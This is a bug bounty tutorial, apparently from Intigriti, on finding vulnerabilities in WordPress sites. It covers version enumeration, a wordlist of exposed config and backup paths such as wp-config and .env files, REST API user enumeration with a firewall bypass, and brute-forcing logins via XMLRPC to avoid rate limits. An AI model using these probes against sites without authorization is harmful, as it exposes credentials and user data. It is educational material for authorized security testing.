Reward your researchers fairly – try our bug bounty calculator today!

Try our bug bounty calculator

5 Ways to hack WordPress targets

By blackbird-eu

February 13, 2025

5 Ways to hack WordPress targets Header Image

Table of contents

Over half a billion websites are powered by WordPress as of today. Unfortunately, not every instance deserves the same security attention as the other. The chances of coming across a bug bounty target that has a vulnerable instance is quite probable. However, some bug bounty hunters get intimidated as WordPress targets are often used as a blogging or documentation platform. For this reason, most skip testing these instances, or at most, only focus on lower-hanging fruits.

In this article, we will cover several ways to identify security vulnerabilities in WordPress targets.

Let's dive in!

What is WordPress?

WordPress is a powerful content management system (CMS) that can be customized by its extensive plugin marketplace with over +70.000 plugins. WordPress can be transformed as an e-commerce website, a landing page to give businesses an online presence or just serve as a blogging platform.

Today, there are over 500 million WordPress instances online, accounting for over 30% of online websites. Not many of them receive the same security attention as they should, partly because of unawareness of common vulnerabilities that are often found in WordPress targets.

Example of a WordPress login page

Let's cover the most common ways to exploit vulnerable WordPress sites!

Exploiting WordPress targets

1) Enumerating outdated instances

Despite efforts, some enterprises and big organizations can quickly lose track of assets that they have at some point set up but have forgotten about. If no automatic updates have been configured, it may be possible that the instance you encountered is running an older version. Especially when it's self-hosted and not done through a managed third-party service.

It's always recommended to check for outdated WordPress instances as they can be vulnerable to all sorts of security vulnerabilities, from simple cross-site scripting (XSS) issues to high-severity vulnerabilities like SQL injections.

Some WordPress instances disclose their version number in the meta HTML tag. Automated tools, like WPScan, or browser extensions such as BuiltWith or Wappalyzer can also help you easily enumerate the version number.

Disclosed WordPress version number

Once you've enumerated the version number, you can look up known vulnerabilities and CVEs and their respective proof of concept.

2) Exposed configuration files

Backups are crucial for any site, however, it sometimes happens that site admins save the backup file in the web root folder. Meaning that any unauthenticated visitors can simply request the file from the server by knowing its location.

In other cases, it happens that administrators forget to set up proper configuration settings, such as disallowing directory listing or missing .htaccess files to prevent unauthorized access to a specific directory.

The easiest way to quickly test for exposed configuration files is by searching for potentially indexed files, another way to find information disclosure is through bruteforcing.

Here are some common paths and files to check for:

.env
.env.bak
.env.php
wp-config-backup.php
wp-config.php.save
wp-config.php~
wp-config.php.old
error_log.log
php_error.log
wp.sql
db.sql
wpbackup.sql
mysql_backup.sql
{TARGET}.zip
{TARGET}-backup.zip
backup.zip

Make sure to change {TARGET} with your target's name.

A few patterns you could take into consideration to find more exposed backup files:

  • The trailing tilde character (~) and .save keyword are mainly used by command line editors to preserve a backup of the original file. If not removed, you'll be able to view the contents of the original file.

  • Try alternating the file extensions, web admins may have backed up data using a different file compression. Change the .zip in the list above with: .rar, .tar, .tar.gz, .bak, .gz

TIP! Try fuzzing your WordPress target with custom wordlists! Wordlists that have been specifically crafted for WordPress targets will generally yield you more results!

3) Misconfigured security settings

During initial setup, WordPress admins may forget to enable or disable a security setting and follow best practices. And this can introduce several side effects such as sensitive information disclosure. Let's take a look at common security misconfigurations found in WordPress setups that often stem from not following best practices.

Open registration

When the option "Anyone can register" is enabled, it makes it possible to create an account and allow unauthorized users to elevate their access. This feature is particularly useful when WordPress admins try to create a community, allowing new people to sign up and interact with each other.

Sometimes, it happens that this feature was planned to be temporarily enabled for testing purposes, during initial setup for example. If this was never turned off, you could visit the /wp-register.php or /wp-login.php?action=register page and sign up for an account.

Example of an open WordPress registration page

Directory listing enabled

Directory listings allow visitors to list the contents of a certain web directory. This is only possible when the web server supports directory listing and when no index file is found. For this reason, it's a best practice to disable directory listing to prevent potential information disclosure.

When testing WordPress targets, try to request the directory and look for directory listings, the most common place where a directory listing is available is under the /wp-content folder, a folder that is specifically preserved on WordPress instances for arbitrary files and uploaded content.

Directory listing of /wp-content/uploads

TIP! Google dorking can help you easily find directory listings on your WordPress targets!

WordPress user enumeration via REST API

WordPress provides a REST API to allow external applications to communicate with your WordPress instance. One particular endpoint can help us enumerate the current authors, it also discloses the email addresses of these accounts (more on this later).

Simply visiting the following endpoint in a vulnerable WordPress target would allow us to list all the current authors: /wp-json/wp/v2/users or /wp-json/wp/v2/users/1

WordPress REST API disclosing sensitive author information

Of course, developers will attempt to block access to these endpoints, luckily for us, we can bypass simple measures and weak validations. For example, by default WordPress also allows us to use the rest_route parameter. This approach is particularly useful when the server or firewall blocks all traffic to the wp-json REST API endpoint:

/?rest_route=/wp-json/wp/v2/users

This endpoint will load the same response as the /wp-json endpoint would.

4) Weak credentials

Some users like to choose convenience over security and for this reason, they use a weak and easy-to-guess username and password combination. Using information from the user enumeration finding documented above, we could test for weak credentials and attempt to elevate our privileges.

Next time, when testing WordPress targets, try to include tests for default and weak credentials.

TIP! When enabled, the XMLRPC endpoint can offer a way to bruteforce login credentials without any of your requests being subject to rate limits!

5) Exploiting vulnerable WordPress plugins and themes

WordPress plugins and themes are a goldmine for bug bounty hunters. Plugins and themes open up new advantages and capabilities to standalone WordPress instances. With its vast marketplace of over 70.000 plugins, each one of them adds new endpoints, features and functionalities. It's probable to come across a vulnerable plugin.

A quick way to check for vulnerable plugins and themes is by first enumerating all enabled extensions on your WordPress targets. One way to do so is by looking at the source code for embedded scripts. Another way is by bruteforcing plugin names as shared with us by @0xLupin in the following Bug Bounty Tip:

Once you've come across an enabled plugin, enumerate its version number and search for known CVEs and their respective proof of concepts!

TIP! WPScan has documented a list of vulnerable WordPress plugins!

Conclusion

We've covered several ways how to find security vulnerabilities in WordPress targets, from exposing sensitive data to gaining root access through vulnerable plugins. Luckily for us, we don't have to manually perform all these checks ourselves, this can also be easily automated using tools like WPScan to help us scan for vulnerabilities at scale.

You’ve just learned how to hack WordPress targets and find high-severity vulnerabilities… Right now, it’s time to put your skills to the test! Browse through our 70+ public bug bounty programs on Intigriti, and who knows, maybe your next bounty will be earned with us!

START HACKING ON INTIGRITI TODAY

You may also like

Creating custom wordlists for bug bounty targets: A complete guide

January 31, 2025

Exploiting PDF generators: A complete guide to finding SSRF vulnerabilities in PDF generators

January 27, 2025

Open URL redirects: A complete guide to exploiting open URL redirect vulnerabilities

January 16, 2025